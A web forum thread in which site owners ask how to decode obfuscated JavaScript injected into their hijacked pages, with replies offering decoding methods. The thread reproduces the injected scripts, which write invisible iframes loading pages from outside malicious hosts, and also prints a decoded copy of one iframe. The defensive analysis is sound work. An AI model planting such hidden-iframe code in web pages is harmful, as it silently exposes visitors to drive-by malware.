I have no knowledge of programming... I can usually look through a script though and figure out what the idea is.
Recently several of my sites got hijacked and below is the code that was inserted, what I'm trying to do is to decode it to figure out what it's intent was and to see if it opened up any other holes in the server that I need to know about.
Maybe this is easy stuff... but I don't have a clue where to start ... -
<script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062'; s+='060073070082065077069032115114099061034104116116112058047047109097114099111098101114110097114100111';s=s+'110105046099111109047120047105110100101120046112104112034032119105100116104061051032104101105103104';s=s+'116061051032115116121108101061034100105115112108097121058110111110101034062060047073070082065077069';s=s+'062032';t='';l=s.length;i=0;while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp();</script><!-- c4 -->
-
any help would be greatly appreciated.
TIA.
10  12286 
Heya, KyredBone. Welcome to TSDN!
Have a look at this thread.
Ok... I looked at that and created a test.php on my server... I see the text box but it is empty... I'm guessing I've done something wrong... how much or what portion exactly do I need to put in -
document.getElementById("test").value = unescape('code goes here')
-
and also do I need the " ' " around the code goes here ?
Ok...once I saw you noted that it was obfuscated JS then I did some more research and found the site below that would decode it .... thx. http://www.netdemon.net/haywyre/
Ok...once I saw you noted that it was obfuscated JS then I did some more research and found the site below that would decode it .... thx.
http://www.netdemon.net/haywyre/
That thread dealt with a simple escaped string. Yours is a bit more complicated. That's why it wouldn't work.
Can anyone tell me about how to decode this script:
<script type="text/javascript">
document.write('\u003c\u0069\u0066\u0072\u0061\u00 6d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068 \u0074\u0074\u0070\u003a\u002f\u002f\u0074\u0072\u 0061\u0066\u0066\u0075\u0072\u006c\u002e\u0072\u00 75\u002f\u0073\u006c\u0069\u0076\u002f\u0069\u006e \u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0022\u 0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u00 20\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031 \u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u 0076\u0069\u0073\u0069\u0062\u0069\u006c\u0069\u00 74\u0079\u003a\u0068\u0069\u0064\u0064\u0065\u006e \u003b\u0070\u006f\u0073\u0069\u0074\u0069\u006f\u 006e\u003a\u0061\u0062\u0073\u006f\u006c\u0075\u00 74\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072 \u0061\u006d\u0065\u003e');
</script>
I encountered this on a friends page and removed it. I know it is associated with traffurl.ru. my "noscript" add on for Firefox blocked the site when I went to his web site which was how I figured out it was in his page but I cannot figure out a way to decode it to see what it is doing. Any help?
[PHP]
<iframe src="http://traffurl.ru/sliv/index.php" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
[/PHP]
Can anyone tell me about how to decode this script:
You've got the decoded version as posted by rnd me, but if you want to decode it yourself, here's a very easy way: replace the document.write with an alert.
Anyone can help me to decode this scripts? - dw_Inf.gw=dw_Inf.fn("\x77\x69\x6e\x64\x6f\x77\x2e\x6c\x6f\x63\x61\x74\x69\x6f\x6e");dw_Inf.ar=[65,32,108,105,99,101,110,115,101,32,105,115,32,114,101,113,117,105,114,101,100,32,102,111,114,32,97,108,108,32,98,117,116,32,112,101,114,115,111,110,97,108,32,117,115,101,32,111,102,32,116,104,105,115,32,99,111,100,101,46,32,83,101,101,32,84,101,114,109,115,32,111,102,32,85,115,101,32,97,116,32,100,121,110,45,119,101,98,46,99,111,109];
- dw_Inf.mg=dw_Inf.fn('\x64\x77\x5f\x49\x6e\x66\x2e\x67\x65\x74\x28\x64\x77\x5f\x49\x6e\x66\x2e\x61\x72\x29');
- dw_Inf.fn('\x64\x77\x5f\x49\x6e\x66\x2e\x67\x77\x3d\x64\x77\x5f\x49\x6e\x66\x2e\x67\x77\x2e\x68\x6f\x73\x74\x6e\x61\x6d\x65');
- dw_Inf.x0=function(){dw_Inf.fn('\x69\x66\x28\x21\x28\x64\x77\x5f\x49\x6e\x66\x2e\x67\x77\x3d\x3d\x22\x22\x7c\x7c\x64\x77\x5f\x49\x6e\x66\x2e\x67\x77\x3d\x3d\x22\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x22\x7c\x7c\x64\x77\x5f\x49\x6e\x66\x2e\x67\x77\x3d\x3d\x22\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\x22\x7c\x7c\x64\x77\x5f\x49\x6e\x66\x2e\x67\x77\x2e\x69\x6e\x64\x65\x78\x4f\x66\x28\x22\x64\x79\x6e\x2d\x77\x65\x62\x2e\x63\x6f\x6d\x22\x29\x21\x3d\x2d\x31\x29\x29\x61\x6c\x65\x72\x74\x28\x64\x77\x5f\x49\x6e\x66\x2e\x6d\x67\x29\x3b');dw_Inf.fn('\x64\x77\x5f\x49\x6e\x66\x2e\x72\x65\x61\x64\x79\x3d\x74\x72\x75\x65\x3b');dw_Inf.fn('\x64\x77\x5f\x73\x63\x72\x6f\x6c\x6c\x65\x72\x73\x2e\x72\x65\x61\x64\x79\x3d\x74\x72\x75\x65\x3b');};
- dw_Inf.fn('\x64\x77\x5f\x49\x6e\x66\x2e\x78\x30\x28\x29\x3b');
Thanks advanced for all helps!!
First of all, welcome to Bytes!
What you can do is wrap those statements in strings and use document.write or alert to display. Those code snippets show as: - dw_Inf.gw=dw_Inf.fn("window.location");dw_Inf.ar=[65,32,108,105,99,101,110,115,101,32,105,115,32,114,101,113,117,105,114,101,100,32,102,111,114,32,97,108,108,32,98,117,116,32,112,101,114,115,111,110,97,108,32,117,115,101,32,111,102,32,116,104,105,115,32,99,111,100,101,46,32,83,101,101,32,84,101,114,109,115,32,111,102,32,85,115,101,32,97,116,32,100,121,110,45,119,101,98,46,99,111,109];
-
dw_Inf.mg=dw_Inf.fn('dw_Inf.get(dw_Inf.ar)');
-
dw_Inf.fn('dw_Inf.gw=dw_Inf.gw.hostname');
-
dw_Inf.x0=function(){dw_Inf.fn('if(!(dw_Inf.gw==""||dw_Inf.gw=="127.0.0.1"||dw_Inf.gw=="localhost"||dw_Inf.gw.indexOf("dyn-web.com")!=-1))alert(dw_Inf.mg);');dw_Inf.fn('dw_Inf.ready=true;');dw_Inf.fn('dw_scrollers.ready=true;');};
-
dw_Inf.fn('dw_Inf.x0();');
Hello Guys,
I have solved your problems - i have made a little tool in vb.net to decode and encode again - below you can find the link where u can see the video also how to use it.
adeelnokiastuffs.blogspot.com/2010/08/javascript-hexa-codes-decoder-and.html
if anything please email me at adeel.rizvi at yda.net.au
Sign in to post your reply or Sign up for a free account.
Similar topics
by: assaf |
last post by:
hi all
i am using PreEmptive Solutions dotfuscator (community edition).
and i am getting 'TypeLoadException' for a simple interface that i defined.
how can i debug an obfuscated application?
...
|
by: Newbie |
last post by:
How would I modify this form
to encode *all* the characters
in the 'source' textarea to the
'%xx' format & place result
code into the 'output' textarea?
(cross browser compatable)
Any help is...
|
by: tgh003 |
last post by:
I would be interested to hear how others are managing their javascript
(.js) files from the original code vs the obfuscated version they
publish to their site/webapp.
I currently manage 2 files,...
|
by: Asha |
last post by:
greetings, attach below are javascripts, if you notice there is a keyword called escape which encodes the entire file and pass onto another fill to be decoded.
here are my implementation for...
|
by: kpmassey |
last post by:
I am trying to use wget to retrieve web pages like this:
http://www.michigan-football.com/s/2006/cascades.htm
Visit it and view source to see the obfuscated javascript.
Is there any tool to...
|
by: kebal |
last post by:
hy friends.. please decode this script.
<script language="JavaScript"> ...
|
by: sureshl |
last post by:
JavaScript Experts,
I have the following HTML. How could I use JavaScript such that when a user clicks on the checkbox in each row the phone numbers and e-mail addresses are partially obfuscated...
|
by: isladogs |
last post by:
The next Access Europe User Group meeting will be on Wednesday 3 Apr 2024 starting at 18:00 UK time (6PM UTC+1) and finishing by 19:30 (7.30PM).
In this session, we are pleased to welcome former...
|
by: taylorcarr |
last post by:
A Canon printer is a smart device known for being advanced, efficient, and reliable. It is designed for home, office, and hybrid workspace use and can also be used for a variety of purposes. However,...
|
by: Charles Arthur |
last post by:
How do i turn on java script on a villaon, callus and itel keypad mobile phone
|
by: aa123db |
last post by:
Variable and constants
Use var or let for variables and const fror constants.
Var foo ='bar';
Let foo ='bar';const baz ='bar';
Functions
function $name$ ($parameters$) {
}
...
|
by: ryjfgjl |
last post by:
If we have dozens or hundreds of excel to import into the database, if we use the excel import function provided by database editors such as navicat, it will be extremely tedious and time-consuming...
|
by: ryjfgjl |
last post by:
In our work, we often receive Excel tables with data in the same format. If we want to analyze these data, it can be difficult to analyze them because the data is spread across multiple Excel files...
|
by: emmanuelkatto |
last post by:
Hi All, I am Emmanuel katto from Uganda. I want to ask what challenges you've faced while migrating a website to cloud.
Please let me know.
Thanks!
Emmanuel
|
by: Sonnysonu |
last post by:
This is the data of csv file
1 2 3
1 2 3
1 2 3
1 2 3
2 3
2 3
3
the lengths should be different i have to store the data by column-wise with in the specific length.
suppose the i have to...
|
by: Hystou |
last post by:
There are some requirements for setting up RAID:
1. The motherboard and BIOS support RAID configuration.
2. The motherboard has 2 or more available SATA protocol SSD/HDD slots (including MSATA, M.2...
| |
